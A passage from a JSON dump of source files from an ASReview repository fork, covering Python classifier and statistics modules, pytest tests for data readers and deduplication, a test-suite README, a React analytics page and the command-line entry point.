"UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.models.classifiers.logistic import LogisticClassifier\nfrom asreview.models.classifiers.lstm_base import LSTMBaseClassifier\nfrom asreview.models.classifiers.lstm_pool import LSTMPoolClassifier\nfrom asreview.models.classifiers.nb import NaiveBayesClassifier\nfrom asreview.models.classifiers.nn_2_layer import NN2LayerClassifier\nfrom asreview.models.classifiers.rf import RandomForestClassifier\nfrom asreview.models.classifiers.svm import SVMClassifier\nfrom asreview.models.classifiers.utils import get_classifier\nfrom asreview.models.classifiers.utils import get_classifier_class\nfrom asreview.models.classifiers.utils import list_classifiers\n\n\"\"\"Machine learning classifiers to classify the documents.\n\nThere are several machine learning classifiers available. In configuration\nfiles, parameters are found under the section ``[model_param]``.\n\"\"\"\n" }, { "alpha_fraction": 0.7986754775047302, "alphanum_fraction": 0.8066225051879883, "avg_line_length": 46.1875, "blob_id": "04be3931c4227c7fc815436403c0021728886eff", "content_id": "d96096d9f1b8ecb85a8582bcf39667c146c654dc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1510, "license_type": "permissive", "max_line_length": 74, "num_lines": 32, "path": "/asreview/models/balance/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.models.balance.double import DoubleBalance\nfrom asreview.models.balance.simple import SimpleBalance\nfrom asreview.models.balance.triple import TripleBalance\nfrom asreview.models.balance.undersample import UndersampleBalance\nfrom asreview.models.balance.utils import get_balance_class\nfrom asreview.models.balance.utils import get_balance_model\nfrom asreview.models.balance.utils import list_balance_strategies\n\n\"\"\"Balance strategies to rebalance and reorder the training data.\n\nThere are several balance strategies that rebalance and reorder the\ntraining data. This is sometimes necessary, because the data is often\nvery imbalanced: there are many more papers that should be excluded than\nincluded (otherwise, automation cannot help much anyway).\n\nThere are several balance strategies available. 
In configuration\nfiles, parameters are found under the section ``[balance_param]``.\n\"\"\"\n" }, { "alpha_fraction": 0.5991328358650208, "alphanum_fraction": 0.6050453186035156, "avg_line_length": 21.551111221313477, "blob_id": "15ab2da1616cf88032cbc4b52436d91fafa239fe", "content_id": "c164ad4cef3e19f3e47968ffff18d959f5d5a68b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5074, "license_type": "permissive", "max_line_length": 74, "num_lines": 225, "path": "/asreview/data/statistics.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport numpy as np\n\n\ndef n_records(data):\n \"\"\"Return the number of records.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n return len(data)\n\n\ndef n_relevant(data):\n \"\"\"Return the number of relevant records.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.labels is not None:\n return len(np.where(data.labels == 1)[0])\n return None\n\n\ndef n_irrelevant(data):\n \"\"\"Return the number of irrelevant records.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.labels is None:\n return None\n return len(np.where(data.labels == 0)[0])\n\n\ndef n_unlabeled(data):\n \"\"\"Return the number of unlabeled records.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.labels is None:\n return None\n return len(data.labels) - n_relevant(data) - n_irrelevant(data)\n\n\ndef n_missing_title(data):\n \"\"\"Return the number of records with missing titles.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n n_missing = 0\n if data.title is None:\n return None, None\n if data.labels is None:\n n_missing_included = None\n else:\n n_missing_included = 0\n for i in range(len(data.title)):\n if len(data.title[i]) == 0:\n n_missing += 1\n if data.labels is not None and data.labels[i] == 1:\n n_missing_included += 1\n return n_missing, n_missing_included\n\n\ndef n_missing_abstract(data):\n \"\"\"Return the number of records with missing abstracts.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n n_missing = 0\n if data.abstract is None:\n return None, None\n if data.labels is None:\n n_missing_included = None\n else:\n n_missing_included = 0\n\n for i in range(len(data.abstract)):\n if 
len(data.abstract[i]) == 0:\n n_missing += 1\n if data.labels is not None and data.labels[i] == 1:\n n_missing_included += 1\n\n return n_missing, n_missing_included\n\n\ndef title_length(data):\n \"\"\"Return the average length of the titles.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.title is None:\n return None\n avg_len = 0\n for i in range(len(data.title)):\n avg_len += len(data.title[i])\n return avg_len / len(data.title)\n\n\ndef abstract_length(data):\n \"\"\"Return the average length of the abstracts.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.abstract is None:\n return None\n avg_len = 0\n for i in range(len(data.abstract)):\n avg_len += len(data.abstract[i])\n return avg_len / len(data.abstract)\n\n\ndef n_keywords(data):\n \"\"\"Return the average number of keywords per record.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.keywords is None:\n return None\n return np.average([len(keywords) for keywords in data.keywords])\n\n\ndef n_duplicates(data, pid=\"doi\"):\n \"\"\"Number of duplicates.\n\n Duplicate detection can be a very challenging task. Multiple\n algorithms can be used and results can vary.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n pid: string\n Which persistent identifier (PID) to use for deduplication.\n Default is 'doi'.\n\n Return\n ------\n int:\n Number of duplicates\n \"\"\"\n return int(data.duplicated(pid).sum())\n" }, { "alpha_fraction": 0.6843559741973877, "alphanum_fraction": 0.6970701813697815, "avg_line_length": 31.303571701049805, "blob_id": "0e0baa8d101e67af2cd86ee042971f956721d4f9", "content_id": "7d9e3de4fd893d5c50ab66ccaa3b3bf3d7f116fa", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1809, "license_type": "permissive", "max_line_length": 79, "num_lines": 56, "path": "/asreview/models/classifiers/nb.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\n\nfrom sklearn.naive_bayes import MultinomialNB\n\nfrom asreview.models.classifiers.base import BaseTrainClassifier\n\n\nclass NaiveBayesClassifier(BaseTrainClassifier):\n \"\"\"Naive Bayes classifier (``nb``).\n\n Naive Bayes classifier. Only works in combination with the\n :class:`asreview.models.feature_extraction.Tfidf` feature extraction model.\n Though relatively simplistic, it seems to work quite well on a wide range of\n datasets.\n\n The naive Bayes classifier is an implementation based\n on the sklearn multinomial naive Bayes classifier.\n\n Arguments\n ---------\n alpha : float, default=3.822\n Additive (Laplace/Lidstone) smoothing parameter\n (0 for no smoothing).\n \"\"\"\n\n name = \"nb\"\n label = \"Naive Bayes\"\n\n def __init__(self, alpha=3.822):\n super(NaiveBayesClassifier, self).__init__()\n self.alpha = alpha\n self._model = MultinomialNB(alpha=alpha)\n logging.debug(self._model)\n\n def full_hyper_space(self):\n from hyperopt import hp\n\n hyper_choices = {}\n hyper_space = {\n \"mdl_alpha\": hp.lognormal(\"mdl_alpha\", 0, 1),\n }\n return hyper_space, hyper_choices\n" }, { "alpha_fraction": 0.7761268019676208, "alphanum_fraction": 0.7771173715591431, "avg_line_length": 66.30000305175781, "blob_id": "0bec6b8dbd4d72d5209bb9f3109e614389ee78de", "content_id": "9641a7267c3d6f854c2bf276856283d335623197", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4038, "license_type": "permissive", "max_line_length": 703, "num_lines": 60, "path": "/asreview/webapp/tests/README.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# ASReview Test Suite\n\nThis folder contains the test suite of the ASReview app. It is organized in the following folders:\n\n- **config**: Contains data to create user accounts and a number of json files to start the ASReview app in different modes (e.g. authenticated, authentication with verification, etc.).\n\n- **data**: Contains project data used in tests.\n\n- **integration_tests**: Forthcoming.\n\n- **test_api**: Contains API related tests. These tests are independent, unit-like tests.\n\n- **test_database_and_models**: Contains tests that focus on basic database operations and several SQLAlchemy models that are used in the authenticated version of the ASReview app.\n\n- **test_extensions**: Forthcoming.\n\n- **utils**: Contains various helper files that facilitate writing tests.\n\n## Requirements\n\n1. [Pytest](https://docs.pytest.org/)\n2. [Pytest-random-order](https://github.com/jbasko/pytest-random-order)\n\n## Fixtures\n\nIf you are unfamiliar with Pytest: fixtures enable a setup and teardown mechanism for all tests. They ensure a controlled initial state and clean up afterwards to make sure the next test is conducted with a clean slate.\n\nIn this suite, all fixtures are defined in `conftest.py` files. 
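A minimal, illustrative sketch of such a fixture (not the suite's actual implementation; the `ASREVIEW_PATH` environment variable is an assumption about how the app locates its folder):\n\n```\nimport pytest\n\n@pytest.fixture\ndef asreview_path_fixture(tmp_path, monkeypatch):\n # assumption: the app reads its ASReview folder location from ASREVIEW_PATH\n monkeypatch.setenv(\"ASREVIEW_PATH\", str(tmp_path))\n yield tmp_path\n```\n\n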
These fixtures are automatically picked up by Pytest and can be found in the `/webapp/tests`-folder, but also in nested folders. The nested conftest modules use fixtures defined in the tests-folder without actually importing them: Pytest finds the required fixture if you use its function name as a parameter in either a newly defined fixture or test function.\n\nNote that the `conftest.py` in the `/webapp/tests` contains an important fixture `asreview_path_fixture`. This suite uses an alternative ASReview folder to avoid disrupting the data of the app in production or development mode. The `asreview_path_fixture` fixture ensures that for every test the ASReview app always starts with its own dedicated, temporary ASReview folder. Pytest states that these folders are automatically removed (https://docs.pytest.org/en/7.1.x/how-to/tmp_path.html#the-default-base-temporary-directory). This might be unwanted behavior if checking the state of the ASReview folder is required. If so, simply create your own ASReview folder in the `asreview_path_fixture` fixture.\n\n## Test functions\n\nIdeally a test function tests one particular feature and can be executed independently from other test functions. If you would like to add a feature or an enhancement to the ASReview app, please accompany your code with appropriate tests. Append your tests to existing modules, or create a new module. If you are adding routes to the API, please wrap your test API calls in a function and place it in `/utils/api_utils.py`. If applicable, make sure your feature works both in an authenticated and an unauthenticated environment.\n\n## Running the tests\n\n**Important**: if you run the entire test suite, please make sure you have compiled the app's assets:\n\n```\npython setup.py compile_assets\n```\n\nPlease run your tests with the `--random-order` option to ensure test independence. With Pytest you can run all tests within a particular module. For example (running from the asreview root-folder):\n\n```\npytest --random-order -s -v ./asreview/webapp/tests/test_api/test_projects.py\n```\n\nThe `-s` option disables output capturing (so your print statements, if any, are shown), and the `-v` option makes the output more verbose. Run an entire folder containing test modules like so:\n\n```\npytest --random-order -s -v ./asreview/webapp/tests/test_api/\n```\n\nIf you are in the middle of writing your tests, and your module contains many tests, it is more efficient to run a small cluster or a single test. One of the many possibilities is the `-k` option, which executes only tests whose names match a given keyword expression. 
In the next example we execute only test functions that match the `current` keyword in the `test_projects.py` module:\n\n```\npytest --random-order -s -v ./asreview/webapp/tests/test_api/test_projects.py -k current\n```\n" }, { "alpha_fraction": 0.43965962529182434, "alphanum_fraction": 0.4564208388328552, "avg_line_length": 26.309858322143555, "blob_id": "a42af53a37d0eece55d7adeda9e0d93e23dfb927", "content_id": "42a94a008d30897740deeea040ace231c650bf5a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3878, "license_type": "permissive", "max_line_length": 88, "num_lines": 142, "path": "/tests/test_data.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import urllib\nfrom pathlib import Path\n\nimport pandas as pd\nfrom pytest import mark\n\nimport asreview\nfrom asreview.data.base import ASReviewData\nfrom asreview.data.statistics import n_duplicates\nfrom asreview.datasets import DatasetManager\nfrom asreview.search import fuzzy_find\n\n\ndef exists(url):\n return urllib.request.urlopen(url).getcode() == 200\n\n\[email protected](\n \"keywords,paper_id\",\n [\n (\"bronchogenic duplication cyst\", 0),\n (\"diagnositc accuracy microscopy female priority\", 1),\n (\"immunophenotiping\", 4),\n (\"Foregut report embryoogenesis\", 4),\n (\"Liu Adler\", 0),\n (\"Khoury cysts\", 4),\n (\"Isolated Edwards\", 5),\n (\"Kwintanilla-djeck Neck\", 3),\n (\"Cancer case computer contrast pancreatomy Yamada\", 2),\n ],\n)\ndef test_fuzzy_finder(keywords, paper_id):\n fp = Path(\"tests\", \"demo_data\", \"embase.csv\")\n as_data = asreview.ASReviewData.from_file(fp)\n\n assert fuzzy_find(as_data, keywords)[0] == paper_id\n\n\[email protected](\n \"data_name\",\n [\n # datasets from the datasets repo\n \"benchmark:van_de_Schoot_2017\",\n \"benchmark:Hall_2012\",\n \"benchmark:Cohen_2006_ACEInhibitors\",\n \"benchmark:Bos_2018\",\n # datasets from the Van de Schoot et al. 
paper\n # https://github.com/asreview/paper-asreview/blob/master/index_v1.json\n \"benchmark-nature:van_de_Schoot_2017\",\n \"benchmark-nature:Hall_2012\",\n \"benchmark-nature:Cohen_2006_ACEInhibitors\",\n \"benchmark-nature:Kwok_2020\",\n ],\n)\ndef test_datasets(data_name):\n data = DatasetManager().find(data_name)\n assert exists(data.filepath)\n\n\ndef test_duplicate_count():\n d = ASReviewData.from_file(Path(\"tests\", \"demo_data\", \"duplicate_records.csv\"))\n\n assert n_duplicates(d) == 2\n\n\ndef test_deduplication():\n d_dups = ASReviewData.from_file(Path(\"tests\", \"demo_data\", \"duplicate_records.csv\"))\n\n s_dups_bool = pd.Series(\n [\n False,\n True,\n False,\n True,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n ]\n )\n\n # test whether .duplicated() provides correct boolean series for duplicates\n pd.testing.assert_series_equal(d_dups.duplicated(), s_dups_bool, check_index=False)\n\n d_nodups = ASReviewData(\n pd.DataFrame(\n {\n \"title\": [\"a\", \"b\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"\", \"\", \" \", \" \"],\n \"abstract\": [\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"\",\n \"\",\n \" \",\n \" \",\n ],\n \"doi\": [\n \"10.1\",\n \"10.3\",\n None,\n None,\n \" \",\n \" \",\n None,\n None,\n \"10.4\",\n \"10.5\",\n \"10.6\",\n \"10.7\",\n ],\n \"some_column\": [\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n ],\n }\n )\n )\n\n # test whether .drop_duplicates() drops the duplicated records correctly\n pd.testing.assert_frame_equal(d_dups.drop_duplicates(), d_nodups.df)\n" }, { "alpha_fraction": 0.5234006643295288, "alphanum_fraction": 0.5255892276763916, "avg_line_length": 28.700000762939453, "blob_id": "b5d470322f80373859fb5cb16f8eaad7369c5885", "content_id": "1f217f9c2e5e52a14466ead5b58763454d4685b6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5940, "license_type": "permissive", "max_line_length": 80, "num_lines": 200, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/AnalyticsPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useQuery } from \"react-query\";\nimport { useParams } from \"react-router-dom\";\nimport {\n EmailIcon,\n TwitterIcon,\n FacebookIcon,\n WeiboIcon,\n WhatsappIcon,\n} from \"react-share\";\nimport {\n Box,\n Button,\n CircularProgress,\n Fade,\n Grid,\n SpeedDial,\n SpeedDialAction,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { Share } from \"@mui/icons-material\";\n\nimport { PageHeader } from \"../../Components\";\nimport {\n NumberCard,\n ShareFabAction,\n ProgressChart,\n ProgressDensityChart,\n ProgressRecallChart,\n} from \"../AnalyticsComponents\";\nimport { TypographyH5Medium } from \"../../StyledComponents/StyledTypography.js\";\n\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { projectModes } from \"../../globals.js\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst actions = [\n { icon: <TwitterIcon round />, name: \"Twitter\" },\n { icon: <FacebookIcon round />, name: \"Facebook\" },\n { icon: <WeiboIcon round />, name: \"Weibo\" },\n { icon: <WhatsappIcon round />, name: \"WhatsApp\" },\n { icon: <EmailIcon round />, name: \"Email\" },\n];\n\nconst 
AnalyticsPage = (props) => {\n const { project_id } = useParams();\n\n const progressQuery = useQuery(\n [\"fetchProgress\", { project_id }],\n ProjectAPI.fetchProgress,\n { refetchOnWindowFocus: false },\n );\n const progressDensityQuery = useQuery(\n [\"fetchProgressDensity\", { project_id }],\n ProjectAPI.fetchProgressDensity,\n { refetchOnWindowFocus: false },\n );\n const progressRecallQuery = useQuery(\n [\"fetchProgressRecall\", { project_id }],\n ProjectAPI.fetchProgressRecall,\n { refetchOnWindowFocus: false },\n );\n\n const twitterRef = React.useRef(null);\n const facebookRef = React.useRef(null);\n const weiboRef = React.useRef(null);\n const whatsappRef = React.useRef(null);\n const emailRef = React.useRef(null);\n\n const handleShare = (platform) => {\n if (platform === \"Twitter\") {\n twitterRef.current?.click();\n }\n if (platform === \"Facebook\") {\n facebookRef.current?.click();\n }\n if (platform === \"Weibo\") {\n weiboRef.current?.click();\n }\n if (platform === \"WhatsApp\") {\n whatsappRef.current?.click();\n }\n if (platform === \"Email\") {\n emailRef.current?.click();\n }\n };\n\n const allQueriesReady = () => {\n return (\n !progressQuery.isFetching &&\n !progressDensityQuery.isFetching &&\n !progressRecallQuery.isFetching\n );\n };\n\n return (\n <Root aria-label=\"analytics page\">\n <Fade in>\n <Box>\n {props.mode !== projectModes.SIMULATION && (\n <PageHeader header=\"Analytics\" mobileScreen={props.mobileScreen} />\n )}\n {props.mode === projectModes.SIMULATION && (\n <Box\n className=\"main-page-sticky-header-wrapper\"\n sx={{ background: (theme) => theme.palette.background.paper }}\n >\n <Box className=\"main-page-sticky-header with-button\">\n {!props.mobileScreen && (\n <TypographyH5Medium>Analytics</TypographyH5Medium>\n )}\n {props.mobileScreen && (\n <Typography variant=\"h6\">Analytics</Typography>\n )}\n <Stack direction=\"row\" spacing={1}>\n <Button\n disabled={!allQueriesReady() || !props.isSimulating}\n variant=\"contained\"\n onClick={props.refetchAnalytics}\n size={!props.mobileScreen ? 
\"medium\" : \"small\"}\n >\n Refresh\n </Button>\n </Stack>\n </Box>\n </Box>\n )}\n {!allQueriesReady() && (\n <Box className=\"main-page-body-wrapper\">\n <CircularProgress />\n </Box>\n )}\n {allQueriesReady() && (\n <Box className=\"main-page-body-wrapper\">\n <Stack spacing={3} className=\"main-page-body\">\n <Box>\n <Grid container spacing={3}>\n <Grid item xs={12} sm={5}>\n <ProgressChart\n isSimulating={props.isSimulating}\n mobileScreen={props.mobileScreen}\n mode={props.mode}\n progressQuery={progressQuery}\n />\n </Grid>\n <Grid item xs={12} sm={7}>\n <NumberCard\n mobileScreen={props.mobileScreen}\n progressQuery={progressQuery}\n />\n </Grid>\n </Grid>\n </Box>\n <ProgressDensityChart\n mobileScreen={props.mobileScreen}\n progressDensityQuery={progressDensityQuery}\n />\n <ProgressRecallChart\n mobileScreen={props.mobileScreen}\n progressRecallQuery={progressRecallQuery}\n />\n </Stack>\n </Box>\n )}\n </Box>\n </Fade>\n {allQueriesReady() && (\n <SpeedDial\n ariaLabel=\"share project analytics\"\n className=\"main-page-fab\"\n icon={<Share />}\n >\n {actions.map((action) => (\n <SpeedDialAction\n key={action.name}\n icon={action.icon}\n tooltipTitle={action.name}\n onClick={() => {\n handleShare(action.name);\n }}\n />\n ))}\n </SpeedDial>\n )}\n <ShareFabAction\n progressQueryData={progressQuery.data}\n twitterRef={twitterRef}\n facebookRef={facebookRef}\n weiboRef={weiboRef}\n whatsappRef={whatsappRef}\n emailRef={emailRef}\n />\n </Root>\n );\n};\n\nexport default AnalyticsPage;\n" }, { "alpha_fraction": 0.6215340495109558, "alphanum_fraction": 0.6287360191345215, "avg_line_length": 31.29069709777832, "blob_id": "b41942266933db9b1ab2f6be3b22ceddda0a3773", "content_id": "d54c4d15fb5937020a7cd9c50bb2587f9725c5ff", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2777, "license_type": "permissive", "max_line_length": 85, "num_lines": 86, "path": "/asreview/__main__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Command Line Interface (CLI) for ASReview project.\"\"\"\nimport argparse\nimport sys\nfrom importlib.metadata import metadata\nfrom itertools import groupby\n\nfrom asreview import __version__\nfrom asreview.utils import _entry_points\n\n# Internal or deprecated entry points. 
These entry points\n# are not displayed in the help page of the user interface.\nINTERNAL_ENTRY_POINTS = [\"web_run_model\"]\nDEPRECATED_ENTRY_POINTS = [\"oracle\"]\n\n\ndef main():\n # Get the available entry points.\n base_entries = _entry_points(group=\"asreview.entry_points\")\n\n if (\n len(sys.argv) > 1\n and not sys.argv[1].startswith(\"-\")\n and sys.argv[1] not in base_entries.names\n ):\n raise ValueError(f\"'{sys.argv[1]}' is not a valid subcommand.\")\n\n elif len(sys.argv) > 1 and sys.argv[1] in base_entries.names:\n entry = base_entries[sys.argv[1]]\n entry.load()().execute(sys.argv[2:])\n\n else:\n description_subcommands = \"\"\n\n for name, dist_entry_points in groupby(\n base_entries, lambda e: e.dist.name,\n ):\n\n description = metadata(name)[\"Summary\"]\n version = metadata(name)[\"Version\"]\n description_subcommands += f\"\\n[{name} {version}] - {description}\\n\"\n\n for entry in dist_entry_points:\n if entry.name not in INTERNAL_ENTRY_POINTS + DEPRECATED_ENTRY_POINTS:\n description_subcommands += f\"\\t{entry.name}\\n\"\n\n parser = argparse.ArgumentParser(\n prog=\"asreview\",\n formatter_class=argparse.RawTextHelpFormatter,\n description=metadata(\"asreview\")[\"Summary\"],\n )\n parser.add_argument(\n \"subcommand\",\n nargs=\"?\",\n default=None,\n help=f\"The subcommand to launch. Available commands:\\n\\n\"\n f\"{description_subcommands}\",\n )\n\n parser.add_argument(\n \"-V\",\n \"--version\",\n action=\"version\",\n version=\"%(prog)s {version}\".format(version=__version__),\n )\n\n args, _ = parser.parse_known_args()\n\n parser.print_help()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.553432285785675, "alphanum_fraction": 0.5795918107032776, "avg_line_length": 29.799999237060547, "blob_id": "ae250055aeab3b06a60395b104e2a429090bd50f", "content_id": "32bf0b3c9c63bcddaa22cf9e61a3d912f8a2951b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5390, "license_type": "permissive", "max_line_length": 83, "num_lines": 175, "path": "/tests/test_readers.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nimport rispy\nfrom pytest import mark\n\nfrom asreview import ASReviewData\nfrom asreview.utils import is_url\n\n\[email protected](\n \"test_file,n_lines,ignore_col\",\n [\n (\"_baseline.ris\", 100, []),\n (\"embase.csv\", 6, [\"keywords\"]),\n (\"embase_newpage.csv\", 6, [\"keywords\"]),\n (\"embase.ris\", 6, []),\n (\"generic.csv\", 2, []),\n (\"generic_semicolon.csv\", 2, []),\n (\"generic_tab.csv\", 2, []),\n (\"generic_tab.tab\", 2, []),\n (\"generic_tab.tsv\", 2, []),\n (\"generic_labels.csv\", 6, []),\n (\"pubmed_zotero.ris\", 6, []),\n (\"pubmed_endnote.txt\", 6, []),\n (\"scopus.ris\", 6, []),\n (\"ovid_zotero.ris\", 6, []),\n (\"proquest.ris\", 6, []),\n (\"https://osf.io/download/fg93a/\", 38, []),\n ],\n)\ndef test_reader(test_file, n_lines, ignore_col):\n if is_url(test_file):\n fp = test_file\n else:\n fp = Path(\"tests\", \"demo_data\", test_file)\n\n as_data = ASReviewData.from_file(fp)\n assert len(as_data) == n_lines\n\n cols = [\"title\", \"abstract\", \"authors\", \"keywords\"]\n cols = [col for col in cols if col not in ignore_col]\n # if labels is not None:\n # cols.append('included')\n # assert np.array_equal(as_data.labels, labels)\n\n for col in cols:\n values = as_data.get(col)\n assert len(values) == n_lines\n\n\[email protected](\n \"record_i,included\",\n [\n # Single line record\n (0, 1),\n 
(1, 0),\n (2, -1),\n (3, -1),\n # Single line record with additional notes, label first\n (4, 1),\n (5, 0),\n (6, -1),\n # Single line record with additional notes, label in the middle\n (7, 1),\n (8, 0),\n (9, -1),\n # Single line record with additional notes, label last\n (10, 1),\n (11, 0),\n (12, -1),\n # Multiline record, label first\n (13, 1),\n (14, 0),\n (15, -1),\n # Multiline record, label in the middle\n (16, 1),\n (17, 0),\n (18, -1),\n # Multiline record, label last\n (19, 1),\n (20, 0),\n (21, -1),\n # Multiline record, with additional notes, label first\n (22, 1),\n (23, 0),\n (24, -1),\n # Multiline record, with additional notes, label in the middle\n (25, 1),\n (26, 0),\n (27, -1),\n # Multiline record, with additional notes, label last\n (28, 1),\n (29, 0),\n (30, -1),\n # No notes tag present\n (31, -1),\n ],\n)\ndef test_asreview_labels_ris(record_i, included):\n fp = Path(\"tests\", \"demo_data\", \"baseline_tag-notes_labels.ris\")\n as_data = ASReviewData.from_file(fp)\n assert as_data.record(record_i, by_index=True).included == included\n\n\ndef test_multiline_tags_ris():\n fp = Path(\"tests\", \"demo_data\", \"baseline_tag_and_field_definitions_lists.ris\")\n entries = rispy.load(fp, encoding=\"utf-8\")\n assert entries[0][\"notes\"] == [\"Notes 1\", \"Notes 2\"]\n\n\ndef test_nan_values_ris():\n fp = Path(\"tests\", \"demo_data\", \"baseline_empty_values.ris\")\n as_data = ASReviewData.from_file(fp)\n\n # Check missing titles\n assert as_data.record(1, by_index=True).title == \"\"\n assert as_data.record(3, by_index=True).title == \"\"\n\n # Check missing abstracts\n assert as_data.record(0, by_index=True).abstract == \"\"\n assert as_data.record(2, by_index=True).abstract == \"\"\n\n # Check missing authors\n assert as_data.record(0, by_index=True).authors is None\n assert as_data.record(2, by_index=True).authors is None\n\n # Check missing keywords\n assert as_data.record(0, by_index=True).keywords is None\n assert as_data.record(2, by_index=True).keywords is None\n\n # Check missing notes\n assert as_data.record(0, by_index=True).notes is None\n assert as_data.record(2, by_index=True).notes is None\n\n # check missing doi\n assert as_data.record(0, by_index=True).doi is None\n assert as_data.record(2, by_index=True).doi is None\n\n\ndef test_nan_values_csv():\n fp = Path(\"tests\", \"demo_data\", \"missing_values.csv\")\n as_data = ASReviewData.from_file(fp)\n\n # Check missing titles\n assert as_data.record(1, by_index=True).title == \"\"\n assert as_data.record(3, by_index=True).title == \"\"\n\n # Check missing abstracts\n assert as_data.record(0, by_index=True).abstract == \"\"\n assert as_data.record(2, by_index=True).abstract == \"\"\n\n # Check missing authors\n assert as_data.record(0, by_index=True).authors is None\n assert as_data.record(2, by_index=True).authors is None\n\n # Check missing keywords\n assert as_data.record(0, 